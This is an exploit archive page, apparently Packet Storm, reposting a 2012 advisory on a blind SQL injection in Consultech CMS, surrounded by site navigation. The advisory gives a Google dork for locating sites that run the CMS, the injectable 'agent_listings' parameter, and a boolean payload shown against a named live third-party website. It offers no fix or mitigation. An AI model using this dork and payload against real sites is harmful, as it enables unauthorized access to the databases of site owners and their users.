Consultech CMS Blind SQL Injection

Consultech CMS Blind SQL Injection: Posted Aug 22, 2012; Authored by Crim3R; Consultech CMS suffers from a remote blind SQL injection vulnerability. Note that this finding houses site-specific data.; tags | exploit, remote, sql injection; SHA-256 | bdb1764a4186af14eca89021ef304f3dc0e67d0b6fed397c1461b3109883ced5; Download | Favorite | View

Consultech CMS Blind SQL Injection


# Exploit Title: Consultech cms Blind Sql Injection 

# Google Dork: inurl:buy-results.asp?agent_listings intext:Powered by Consultech

# Date: 08/22/2012

# Author: Crim3R

# Vendor Home : http://www.consultech.net/

# Tested on: all
==================================
 
 the agent_listings parametr is agent_listings to blind sql injection
    http://127.0.0.1/public/buy-results.asp?agent_listings=[id][Bsqli] 

D3m0:

http://www.homefinder.org/public/buy-results.asp?agent_listings=3830146045 and 
2*5=10

===============Crim3R@Att.Net=========

$Home = %00

thanks to :  2MzRp - Mikili - 0x0ptim0us - iC0d3R - farbodmahini & Amir

Top Authors In Last 30 Days

Red Hat 232 files
Ubuntu 61 files
LiquidWorm 24 files
Debian 18 files
indoushka 15 files
Apple 9 files
Google Security Research 6 files
Gentoo 5 files
Jann Horn 3 files
Alter Prime 3 files

File Archives

Systems

AIX (430)
Apple (2,126)
BSD (378)
CentOS (61)
Cisco (1,954)
Debian (7,156)
Fedora (1,693)
FreeBSD (1,247)
Gentoo (4,604)
HPUX (881)
iOS (393)
iPhone (108)
IRIX (220)
Juniper (71)
Linux (51,827)
Mac OS X (696)
Mandriva (3,105)
NetBSD (256)
OpenBSD (490)
RedHat (17,244)
Slackware (941)
Solaris (1,615)
SUSE (1,444)
Ubuntu (9,969)
UNIX (9,474)
UnixWare (188)
Windows (6,784)
Other

Consultech CMS Blind SQL Injection

Consultech CMS Blind SQL Injection

File Archive:

November 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

Consultech CMS Blind SQL Injection

Share This

Consultech CMS Blind SQL Injection

File Archive:

November 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems